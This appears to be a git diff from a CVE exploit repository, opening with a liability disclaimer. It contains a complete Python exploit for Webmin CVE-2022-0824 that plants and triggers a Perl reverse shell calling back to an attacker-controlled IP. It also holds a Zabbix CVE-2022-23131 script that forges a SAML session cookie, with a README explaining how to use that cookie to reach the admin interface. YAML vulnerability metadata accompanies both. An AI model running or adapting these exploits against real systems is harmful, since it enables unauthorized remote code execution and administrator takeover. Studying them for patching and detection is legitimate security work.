The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities diff --git a/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py b/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py old mode 100755 new mode 100644 index 2f27a1d29ae89371cf6f3294ccb23851329fe0f9..cde6a67e97a806c0327e82e28301e801f934f3e6 --- a/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py +++ b/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py @@ -1,146 +1,146 @@ -#!/usr/bin/python3 - -""" -Coded by: @faisalfs10x -GitHub: https://github.com/faisalfs10x -Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ -""" - -import requests -import urllib3 -import argparse -import os -import time - -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) - -TGREEN = '\033[32m' -TRED = '\033[31m' -TCYAN = '\033[36m' -TSHELL = '\033[32;1m' -ENDC = '\033[m' - -class Exploit(object): - def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname): - self.target = target - self.username = username - self.password = password - self.py3http_server = py3http_server - self.pyhttp_port = pyhttp_port - self.upload_path = upload_path - self.callback_ip = callback_ip - self.callback_port = callback_port - self.fname = fname - - #self.proxies = proxies - self.s = requests.Session() - - - def gen_payload(self): - payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') - print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC) - f = open(f"{self.fname}", "w") - f.write(payload) - f.close() - - def login(self): - login_url = self.target + "/session_login.cgi" - cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" } - - data = { 'user' : self.username, 'pass' : self.password } - try: - r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10) - success_message = 'System hostname' - if success_message in r.text: - print(TGREEN + "[+] Login Successful", ENDC) - else: - print(TRED +"[-] Login Failed", ENDC) - exit() - - except requests.Timeout as e: - print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC) - exit() - - def pyhttp_server(self): - print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n') - os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up - print('[+] Sleep 3 second to ensure http server is up!') - time.sleep(3) # Sleep for 5 seconds to ensure http server is up! - - def download_remote_url(self): - download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin" - headers = { - "Accept": "application/json, text/javascript, */*; q=0.01", - "Accept-Encoding": "gzip, deflate", - "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", - "X-Requested-With": "XMLHttpRequest", - "Referer": self.target + "/filemin/?xnavigation=1" - } - - data = { - 'link': "http://" + self.py3http_server + "/" + self.fname, - 'username': '', - 'password': '', - 'path': self.upload_path - } - - r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True) - print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}") - - def modify_permission(self): - modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30" - headers = { "Referer": self.target + "/filemin/?xnavigation=1" } - data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path } - - r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True) - print(f"[+] Modifying permission of {self.fname} to 0755") - - def exec_revshell(self): - url = self.target + '/' + self.fname - try: - r = self.s.get(url, verify=False, allow_redirects=True, timeout=3) - except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned! - print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC) - print("[+] Shell location: " + url) - else: - print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC) - - def do_cleanup(self): - print(TCYAN + '\n[+] Cleaning up ') - print(f'[+] Killing: http.server on port {self.pyhttp_port}') - os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})') - exit() - - def run(self): - self.gen_payload() - self.login() - self.pyhttp_server() - self.download_remote_url() - self.modify_permission() - self.exec_revshell() - self.do_cleanup() - - -if __name__ == "__main__": - - parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell') - parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000') - parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123') - parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080') - parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell') - parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell') - parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0') - args = parser.parse_args() - - target = args.target - username = args.credential.split(':')[0] - password = args.credential.split(':')[1] - py3http_server = args.py3http_server - pyhttp_port = py3http_server.split(':')[1] - callback_ip = args.callback_ip - callback_port = args.callback_port - upload_path = "/usr/share/webmin" - fname = "revshell.cgi" - - pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname) +#!/usr/bin/python3 + +""" +Coded by: @faisalfs10x +GitHub: https://github.com/faisalfs10x +Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ +""" + +import requests +import urllib3 +import argparse +import os +import time + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +TGREEN = '\033[32m' +TRED = '\033[31m' +TCYAN = '\033[36m' +TSHELL = '\033[32;1m' +ENDC = '\033[m' + +class Exploit(object): + def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname): + self.target = target + self.username = username + self.password = password + self.py3http_server = py3http_server + self.pyhttp_port = pyhttp_port + self.upload_path = upload_path + self.callback_ip = callback_ip + self.callback_port = callback_port + self.fname = fname + + #self.proxies = proxies + self.s = requests.Session() + + + def gen_payload(self): + payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') + print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC) + f = open(f"{self.fname}", "w") + f.write(payload) + f.close() + + def login(self): + login_url = self.target + "/session_login.cgi" + cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" } + + data = { 'user' : self.username, 'pass' : self.password } + try: + r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10) + success_message = 'System hostname' + if success_message in r.text: + print(TGREEN + "[+] Login Successful", ENDC) + else: + print(TRED +"[-] Login Failed", ENDC) + exit() + + except requests.Timeout as e: + print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC) + exit() + + def pyhttp_server(self): + print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n') + os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up + print('[+] Sleep 3 second to ensure http server is up!') + time.sleep(3) # Sleep for 5 seconds to ensure http server is up! + + def download_remote_url(self): + download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin" + headers = { + "Accept": "application/json, text/javascript, */*; q=0.01", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", + "X-Requested-With": "XMLHttpRequest", + "Referer": self.target + "/filemin/?xnavigation=1" + } + + data = { + 'link': "http://" + self.py3http_server + "/" + self.fname, + 'username': '', + 'password': '', + 'path': self.upload_path + } + + r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True) + print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}") + + def modify_permission(self): + modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30" + headers = { "Referer": self.target + "/filemin/?xnavigation=1" } + data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path } + + r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True) + print(f"[+] Modifying permission of {self.fname} to 0755") + + def exec_revshell(self): + url = self.target + '/' + self.fname + try: + r = self.s.get(url, verify=False, allow_redirects=True, timeout=3) + except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned! + print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC) + print("[+] Shell location: " + url) + else: + print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC) + + def do_cleanup(self): + print(TCYAN + '\n[+] Cleaning up ') + print(f'[+] Killing: http.server on port {self.pyhttp_port}') + os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})') + exit() + + def run(self): + self.gen_payload() + self.login() + self.pyhttp_server() + self.download_remote_url() + self.modify_permission() + self.exec_revshell() + self.do_cleanup() + + +if __name__ == "__main__": + + parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell') + parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000') + parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123') + parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080') + parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell') + parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell') + parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0') + args = parser.parse_args() + + target = args.target + username = args.credential.split(':')[0] + password = args.credential.split(':')[1] + py3http_server = args.py3http_server + pyhttp_port = py3http_server.split(':')[1] + callback_ip = args.callback_ip + callback_port = args.callback_port + upload_path = "/usr/share/webmin" + fname = "revshell.cgi" + + pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname) pwn.run() \ No newline at end of file diff --git a/cve/webmin/2022/yaml/CVE-2022-0824.yaml b/cve/webmin/2022/yaml/CVE-2022-0824.yaml old mode 100755 new mode 100644 index 759b4b56d2e3b427d23e98bc4c467d5c9686871a..691f234fc94f1e9417479a1d0e52f124779f2af3 --- a/cve/webmin/2022/yaml/CVE-2022-0824.yaml +++ b/cve/webmin/2022/yaml/CVE-2022-0824.yaml @@ -1,20 +1,20 @@ -id: CVE-2022-0824 -source: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell -info: - name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。 - severity: high - description: | - 在GitHub仓库webmin/webmin 1.990之前,访问控制不当导致远程代码执行。 - scope-of-influence: - webmin < 1.990 - reference: - - https://nvd.nist.gov/vuln/detail/cve-2022-0824 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-0824 - cwe-id: CWE-863, CWE-284 - cnvd-id: None - kve-id: None - tags: cve2022, RCE +id: CVE-2022-0824 +source: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell +info: + name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。 + severity: high + description: | + 在GitHub仓库webmin/webmin 1.990之前,访问控制不当导致远程代码执行。 + scope-of-influence: + webmin < 1.990 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-0824 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-0824 + cwe-id: CWE-863, CWE-284 + cnvd-id: None + kve-id: None + tags: cve2022, RCE \ No newline at end of file diff --git a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py index 881c7d68b81161bb0d8019c5d8808a25e8231542..93756db10de5fb6382dfb3a2205233936c1fe6c8 100644 --- a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py +++ b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py @@ -1,37 +1,37 @@ -import requests -import re -import urllib.parse -import base64 -import json -import sys - -def exp(target, username): - resp = requests.get(url=target, verify=False) - cookie = resp.headers.get("Set-Cookie") - - zbx_session = re.findall(r"zbx_session=(.*?); ", cookie) - - url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8') - base64_decode_data = base64.b64decode(url_decode_data) - - decode_to_str = str(base64_decode_data, encoding='utf-8') - - to_json = json.loads(decode_to_str) - - tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"]) - - payloadJson = json.dumps(tmp_ojb) - print("decode_payload:", payloadJson) - - payload = urllib.parse.quote(base64.b64encode(payloadJson.encode())) - print("zbx_signed_session:", payload) - - -if __name__ == "__main__": - if len(sys.argv) != 3: - print("argv error") - exit(0) - target = sys.argv[1] - username = sys.argv[2] - +import requests +import re +import urllib.parse +import base64 +import json +import sys + +def exp(target, username): + resp = requests.get(url=target, verify=False) + cookie = resp.headers.get("Set-Cookie") + + zbx_session = re.findall(r"zbx_session=(.*?); ", cookie) + + url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8') + base64_decode_data = base64.b64decode(url_decode_data) + + decode_to_str = str(base64_decode_data, encoding='utf-8') + + to_json = json.loads(decode_to_str) + + tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"]) + + payloadJson = json.dumps(tmp_ojb) + print("decode_payload:", payloadJson) + + payload = urllib.parse.quote(base64.b64encode(payloadJson.encode())) + print("zbx_signed_session:", payload) + + +if __name__ == "__main__": + if len(sys.argv) != 3: + print("argv error") + exit(0) + target = sys.argv[1] + username = sys.argv[2] + exp(target, username) \ No newline at end of file diff --git a/cve/zabbix/2022/CVE-2022-23131/README.md b/cve/zabbix/2022/CVE-2022-23131/README.md index bd13b10a9cf767ecd0547743377efcdb764b7310..4fabab8c1f5d7e96704ec250df0abac6269b43ae 100644 --- a/cve/zabbix/2022/CVE-2022-23131/README.md +++ b/cve/zabbix/2022/CVE-2022-23131/README.md @@ -1,4 +1,4 @@ -CVE-2022-23131 -使用方式:python3 CVE-2022-23131.py target Admin -其中,target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面 - +CVE-2022-23131 +使用方式:python3 CVE-2022-23131.py target Admin +其中,target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面 + diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml deleted file mode 100644 index 0eab256c4dfe862200d680cff85dda2a1537ef4e..0000000000000000000000000000000000000000 --- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2022-23131 -source: - https://github.com/L0ading-x/cve-2022-23131 -info: - name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 - severity: critical - description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 - scope-of-influence: - Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - - https://www.secpulse.com/archives/179601.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23131 - cwe-id: CWE-290 - cnvd-id: None - kve-id: None - tags: 前端认证绕过漏洞 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index fc7663c89bd57e1472b6072d7ca583e1c6d5cb50..226fdef942597c06e165248ec87720bc4e9c2359 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -29,6 +29,8 @@ cve: - CVE-2021-1056 java-spring-cloud-gateway: - CVE-2022-22947 + java-spring-security: + - CVE-2022-22978 apache-commons-text: - CVE-2022-42889 unzip: